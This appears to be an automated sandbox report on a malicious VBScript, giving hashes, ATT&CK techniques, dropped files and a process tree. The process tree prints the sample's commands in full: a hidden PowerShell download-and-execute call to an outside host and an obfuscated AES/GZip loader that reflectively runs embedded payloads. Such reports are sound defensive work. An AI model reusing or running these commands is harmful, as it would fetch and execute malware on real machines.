13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace

General

Target

2570_output.vbs
Size

421KB
MD5

1304afcdfc224427dfe647dd10025628
SHA1

54de753563e6a041ca67a90e50c121cd32f2e125
SHA256

13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
SHA512

23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
SSDEEP

6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2480	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2480	powershell.exe
344	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	344	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2436 wrote to memory of 2480	2436	WScript.exe	31
PID 2436 wrote to memory of 2480	2436	WScript.exe	31
PID 2436 wrote to memory of 2480	2436	WScript.exe	31
PID 2436 wrote to memory of 1176	2436	WScript.exe	33
PID 2436 wrote to memory of 1176	2436	WScript.exe	33
PID 2436 wrote to memory of 1176	2436	WScript.exe	33
PID 1176 wrote to memory of 2576	1176	cmd.exe	35
PID 1176 wrote to memory of 2576	1176	cmd.exe	35
PID 1176 wrote to memory of 2576	1176	cmd.exe	35
PID 2576 wrote to memory of 2636	2576	cmd.exe	37
PID 2576 wrote to memory of 2636	2576	cmd.exe	37
PID 2576 wrote to memory of 2636	2576	cmd.exe	37
PID 2576 wrote to memory of 344	2576	cmd.exe	38
PID 2576 wrote to memory of 344	2576	cmd.exe	38
PID 2576 wrote to memory of 344	2576	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2480
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
      4⤵
      PID:2636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\n1.bat

Filesize
420KB

MD5
a21d4680c8d115c444119d6b1ca6aed6

SHA1
fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2

SHA256
1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f

SHA512
b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
9f7161d90acb2a9b98ceca68b20e6a25

SHA1
5f81a6e810eaaeebb0a9ecf2d062975c6a4c330c

SHA256
65bdc84fa5af2800b5f2267f1bd872ff05089790f825ad0d3935c03ebee49afa

SHA512
3d2c5eadb23b34b919d47e69409931a02345694b0a38b3f45374bf89868a35f9c2923122a650843d23b3a6dd5d6a24ffdcdbc34b64d7b7ef4c0fcadb1f7b2574

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K8Z5WTW90GAFMXQP4EOV.temp

Filesize
7KB

MD5
cd1eff8caaa3f36fafed05b0d8b6bfb3

SHA1
b257679eea1317250067439bc10ae77688fd97c2

SHA256
d930bd507036c9266261ca9e09e43ad778b638b9a67df330216d6937bfa037d8

SHA512
e952652029f2e80109dd9e56933b6cdc28faff5caf07ec028c4347ade6619c6f2176b8deeabb8a8792112d2886646818e3dde8539196cd639b9d83b4be08c28d

Download Submit
memory/344-27-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/344-26-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2480-7-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-8-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-11-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/2480-9-0x0000000002764000-0x0000000002767000-memory.dmp

Filesize
12KB

Download
memory/2480-10-0x000000000276B000-0x00000000027D2000-memory.dmp

Filesize
412KB

Download
memory/2480-4-0x000007FEF56EE000-0x000007FEF56EF000-memory.dmp

Filesize
4KB

Download
memory/2480-6-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download
memory/2480-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing